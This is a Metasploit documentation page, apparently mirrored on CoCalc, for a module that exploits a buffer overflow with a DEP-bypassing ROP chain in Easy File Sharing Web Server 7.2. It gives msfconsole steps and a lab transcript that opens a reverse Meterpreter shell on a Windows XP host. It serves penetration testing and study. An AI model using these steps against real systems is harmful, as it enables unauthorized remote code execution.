CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/http/easyfilesharing_post.md
Views: 11789

Description

This module exploits a vulnerability in the Easy File Sharing Web Server application. It uses an overflow in the Email Post parameter, bypassing DEP via a ROP chain.

This module allows a remote attacker to execute a payload under the context of the user running the Easy File Sharing application

Vulnerable Application

Easy File Sharing is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE, Firefox, Chrome etc.).

This module has been tested successfully on

  • Easy File Sharing 7.2 on Windows XP En Sp3

Installers:

Easy File Sharing Installers

Verification Steps

  1. Start msfconsole

  2. Do: use exploits/windows/http/easyfilesharing_post

  3. Do: set rhosts [IP]

  4. Do: exploit

  5. You should get your payload executed

Scenarios

root@kali:~$ msfconsole -q
msf > use exploit/windows/http/easyfilesharing_post
msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easyfilesharing_post) > exploit

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200

meterpreter > sysinfo
Computer    	: MM
OS          	: Windows XP (Build 2600, Service Pack 3).
Architecture	: x86
System Language : en_US
Domain      	: WORKGROUP
Logged On Users : 2
Meterpreter 	: x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(easyfilesharing_post) >